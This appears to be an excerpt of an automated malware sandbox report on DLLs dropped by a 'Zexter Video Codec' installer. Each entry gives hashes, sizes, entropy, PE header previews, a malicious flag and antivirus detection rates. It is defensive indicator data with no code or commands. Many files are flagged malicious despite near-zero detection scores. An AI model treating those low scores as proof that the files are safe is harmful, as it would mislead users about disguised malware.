                                                                                                    SHA-256:FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
                                                                                                    SHA-512:392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libharfbuzz-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):441975
                                                                                                    Entropy (8bit):6.372283713065844
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
                                                                                                    MD5:6CD78C8ADD1CFC7CBB85E2B971FCC764
                                                                                                    SHA1:5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
                                                                                                    SHA-256:C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
                                                                                                    SHA-512:EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................|....................................................................................text...4|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..|...........................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libiconv-2.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1055417
                                                                                                    Entropy (8bit):7.312780382733874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:1MWKOBAUZLYRwPKDOlbbT0pGavkg3NyeuQ6l9fHOfc4Z:1dBAUZLYWiDOSpGaXBuQQ9u3Z
                                                                                                    MD5:F721A6B0A1590D55EADEAE81B8F629AA
                                                                                                    SHA1:8C6ED37D1D926D949161FF5F3B5682A4068644CE
                                                                                                    SHA-256:8E2EB9BAC3F5C37D91BFF7F04420DDA55CD369178C73ADF11E6C4DD7E597260F
                                                                                                    SHA-512:2FFDB23615EE72DF600248D6B9DED0E25DAE12D8424557EC07589F34601C00421CF32A748CB564AFCED99B419805E43BF4D6D05EC33D581DBD03F9AF853005E8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........F......#.............................. f.......................................... ...................... ..u....0..<....`.......................p...............................P......................T1...............................text...D...........................`.P`.data...T...........................@.0..rdata..............................@.`@/4......TI.......J..................@.0@.bss..................................`..edata..u.... ......................@.0@.idata..<....0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libintl-8.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):140752
                                                                                                    Entropy (8bit):6.52778891175594
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
                                                                                                    MD5:A8F646EB087F06F5AEBC2539EB14C14D
                                                                                                    SHA1:4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
                                                                                                    SHA-256:A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
                                                                                                    SHA-512:93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libjpeg-8.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):509934
                                                                                                    Entropy (8bit):6.031080686301204
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                                                                    MD5:02E6C6AB886700E6F184EEE43157C066
                                                                                                    SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                                                                    SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                                                                    SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\liblcms2-2.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):397808
                                                                                                    Entropy (8bit):6.396146399966879
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                                                                    MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                                                                    SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                                                                    SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                                                                    SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\liblzma-5.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171848
                                                                                                    Entropy (8bit):6.579154579239999
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                                                                    MD5:236A679AB1B16E66625AFBA86A4669EB
                                                                                                    SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                                                                    SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                                                                    SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpango-1.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):259014
                                                                                                    Entropy (8bit):6.075222655669795
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                                                                    MD5:B4FDE05A19346072C713BE2926AF8961
                                                                                                    SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                                                                    SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                                                                    SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpangocairo-1.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64724
                                                                                                    Entropy (8bit):5.910307743399971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                                                                    MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                                                                    SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                                                                    SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                                                                    SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpangoft2-1.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):92019
                                                                                                    Entropy (8bit):5.974787373427489
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                                                                    MD5:CC7DAD980DD04E0387795741D809CBF7
                                                                                                    SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                                                                    SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                                                                    SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpangomm-1.4-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165739
                                                                                                    Entropy (8bit):6.062324507479428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                                                                    MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                                                                    SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                                                                    SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                                                                    SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpangowin32-1.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):101544
                                                                                                    Entropy (8bit):6.237382830377451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                                                                    MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                                                    SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                                                    SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                                                    SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpcre-1.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):291245
                                                                                                    Entropy (8bit):6.234245376773595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                                                    MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                                                    SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                                                    SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                                                    SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpixman-1-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):706136
                                                                                                    Entropy (8bit):6.517672165992715
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                                                    MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                                                    SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                                                    SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                                                    SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libpng16-16.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):248781
                                                                                                    Entropy (8bit):6.474165596279956
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                                                    MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                                                    SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                                                    SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                                                    SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\librsvg-2-2.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):248694
                                                                                                    Entropy (8bit):6.346971642353424
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                                                    MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                                                    SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                                                    SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                                                    SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libsigc-2.0-0.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30994
                                                                                                    Entropy (8bit):5.666281517516177
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                                                    MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                                                    SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                                                    SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                                                    SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libstdc++-6.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1545467
                                                                                                    Entropy (8bit):6.529166035051036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:f//9GOTyiDI4jm0B4/W1EkWLENaQemY0y6hW98cA4q0v4gf:bVYKW983e
                                                                                                    MD5:7F95672216191C57573D049090125ECE
                                                                                                    SHA1:2C9D065A1F28F511149C3DBA219B52004FC51262
                                                                                                    SHA-256:689991853CD09032089F52656C9508061F105FAB5727F250890563EBF2656A45
                                                                                                    SHA-512:FD0DD095D5D76400FA97F5B3231D16570284EC31D04E2E9F3278F378233F316D4D91715898BF8A1B81803E613B97B2FE5FB064A9BD6BAE6E08AD3CAB9613E61B
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........~.........#.....4...z...............P.....o.......................................... ..........................p...0...............................p...t...........................`.......................2..D............................text....2.......4..................`.P`.data........P... ...8..............@.`..rdata..@....p.......X..............@.`@/4.......M...P...N...2..............@.0@.bss..................................`..edata...p.......r..................@.0@.idata.......0......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc...t...p...v..................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\libtiff-5.dll (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):448557
                                                                                                    Entropy (8bit):6.353356595345232
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                                                    MD5:908111F583B7019D2ED3492435E5092D
                                                                                                    SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                                                    SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                                                    SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
